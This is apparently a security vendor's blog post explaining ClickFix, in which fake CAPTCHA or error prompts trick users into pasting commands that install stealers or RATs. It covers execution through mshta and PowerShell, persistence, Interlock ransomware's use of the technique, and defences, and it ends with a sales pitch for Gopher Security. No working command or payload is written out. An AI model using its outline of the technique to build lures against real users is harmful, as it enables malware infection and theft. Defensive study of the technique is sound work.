ClickFix: The New Malware Tactic Exploiting Social Engineering
TL;DR
ClickFix Social Engineering Attacks: A Technical Deep Dive
ClickFix is a social engineering technique that tricks users into running malicious commands themselves, leading to malware installation and other malicious activities. This technique has become prevalent due to its ability to target multiple operating systems and bypass traditional security defenses. Security researchers have observed a significant increase in ClickFix attacks, with a 500%+ spike in 2025.
How ClickFix Works
ClickFix attacks exploit users' familiarity with CAPTCHAs and other verification prompts. The attack flow typically involves the following steps:
- Infection: Users visit a website infected with ClickFix, often through compromised legitimate sites or malicious advertisements.
- Deceptive Message: A fake error message or CAPTCHA appears, instructing the user to "fix" the problem by running a command in Windows Run, PowerShell, or Terminal.
- Command Execution: The user copies and pastes the command, believing they are solving an issue.
- Malware Installation: The command silently downloads and installs malware such as Lumma Stealer, DarkGate, or NetSupport RAT.
Image courtesy of Cybersecurity News
The effectiveness of ClickFix lies in its ability to bypass traditional security defenses. Because the user is running the command, antivirus and other security tools often do not flag it as malicious. This is further enhanced by the use of trusted tools like PowerShell and Run, which are built into Windows. More on ClickFix Analysis
Technical Details
A typical ClickFix attack involves the following technical stages:
- Initial Access: Attackers gain initial access via drive-by downloads from compromised legitimate websites or through social engineering techniques. MITRE ATT&CK® Matrix for Enterprise
- Execution: Malicious payloads are executed using
mshta.exeor PowerShell, often downloading and running a malware dropper. PowerShell - Persistence: Persistence is established by creating a file in the Windows Startup folder or modifying Windows Registry keys. Windows Registry key modification
- Steganography: Some ClickFix campaigns use steganography to hide malicious shellcode within image files, making detection more difficult. steganography
- Payload Delivery: The final payload often includes info-stealing malware like LummaC2 or Rhadamanthys.
Interlock Ransomware and ClickFix
The Interlock ransomware group has been observed using ClickFix as part of its attack chain. Interlock is a financially motivated group that targets businesses and critical infrastructure sectors across North America and Europe. CISA and FBI Warn of Escalating Interlock Ransomware Attacks
Interlock actors have been observed:
- Obtaining initial access via drive-by downloads from compromised legitimate websites. drive-by download
- Using ClickFix social engineering to trick users into executing malicious payloads. social engineering technique
- Employing a double extortion model, encrypting systems after exfiltrating data. double extortion
- Leveraging tools like Cobalt Strike and SystemBC for command and control.
Defense Strategies
To defend against ClickFix attacks, organizations should implement the following measures:
- User Education: Train employees to recognize social engineering tactics and avoid running commands from untrusted sources. social engineering
- Restrict PowerShell Execution: Implement policies to restrict PowerShell execution for standard users, ensuring only signed scripts can run. PowerShell scripts
- Application Allowlists: Create application allowlists to manage and control software on the network. application allowlists
- Network Monitoring: Utilize network intrusion detection systems (NIDS) to identify and report malicious events. Albert Network Monitoring and Management
- Endpoint Protection: Deploy real-time anti-malware solutions with web protection components. anti-malware solution
- DNS Filtering: Implement domain name system (DNS) filtering to prevent initial access to malicious domains.
Gopher Security's Zero-Trust Architecture
Gopher Security specializes in AI-powered, post-quantum Zero-Trust cybersecurity architecture. Our platform converges networking and security across devices, apps, and environments—from endpoints and private networks to cloud, remote access, and containers—using peer-to-peer encrypted tunnels and quantum-resistant cryptography. This architecture is designed to mitigate threats like ClickFix by ensuring that every user, device, and application is authenticated and authorized before accessing any resource, regardless of location.
By implementing domain name system (DNS) filtering and web access firewalls, and training users to spot phishing attempts. Gopher Security provides robust endpoint detection and response (EDR) tooling and capabilities and can uncover hidden red flags of intrusion and can even prevent attackers gaining an initial foothold in the first place.
Gopher Security solutions can significantly reduce the risk of ClickFix attacks by:
- Verifying User Identity: Ensuring that users are who they claim to be through multi-factor authentication and continuous monitoring.
- Validating Device Security: Checking that devices meet security requirements before granting access.
- Limiting Application Access: Restricting application access to only what is necessary for the user's role.
- Securing Network Connections: Encrypting all network traffic to prevent eavesdropping and data theft.
Mitigations
FBI, CISA, HHS, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Interlock ransomware incidents.
Links
Take Action
Protect your organization from advanced social engineering attacks like ClickFix. Contact Gopher Security today to learn more about our AI-powered, post-quantum Zero-Trust cybersecurity solutions and how we can help you build a more secure and resilient infrastructure.
